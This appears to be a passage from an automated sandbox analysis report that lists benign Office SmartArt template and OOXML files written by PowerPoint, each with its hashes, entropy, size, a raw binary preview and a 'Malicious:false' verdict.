                                                                                                                              SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                              MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                              SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                              SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                              SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4243
                                                                                                                              Entropy (8bit):7.824383764848892
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                              MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                              SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                              SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                              SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4026
                                                                                                                              Entropy (8bit):7.809492693601857
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                              MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                              SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                              SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                              SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):250
                                                                                                                              Entropy (8bit):3.4916022431157345
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                              MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                              SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                              SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                              SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):252
                                                                                                                              Entropy (8bit):3.48087342759872
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                              MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                              SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                              SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                              SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4326
                                                                                                                              Entropy (8bit):7.821066198539098
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                              MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                              SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                              SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                              SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):252
                                                                                                                              Entropy (8bit):3.4680595384446202
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                              MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                              SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                              SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                              SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5783
                                                                                                                              Entropy (8bit):7.88616857639663
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                              MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                              SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                              SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                              SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):258
                                                                                                                              Entropy (8bit):3.4692172273306268
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                              MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                              SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                              SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                              SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7370
                                                                                                                              Entropy (8bit):7.9204386289679745
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                              MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                              SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                              SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                              SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):262
                                                                                                                              Entropy (8bit):3.4901887319218092
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                              MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                              SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                              SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                              SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5596
                                                                                                                              Entropy (8bit):7.875182123405584
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                              MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                              SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                              SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                              SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
                                                                                                                              Entropy (8bit):3.484503080761839
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                              MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                              SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                              SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                              SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):9191
                                                                                                                              Entropy (8bit):7.93263830735235
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                              MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                              SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                              SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                              SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):16806
                                                                                                                              Entropy (8bit):7.9519793977093505
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                              MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                              SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                              SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                              SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):254
                                                                                                                              Entropy (8bit):3.4720677950594836
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                              MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                              SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                              SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                              SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):242
                                                                                                                              Entropy (8bit):3.4938093034530917
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                              MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                              SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                              SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                              SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                              Malicious:false
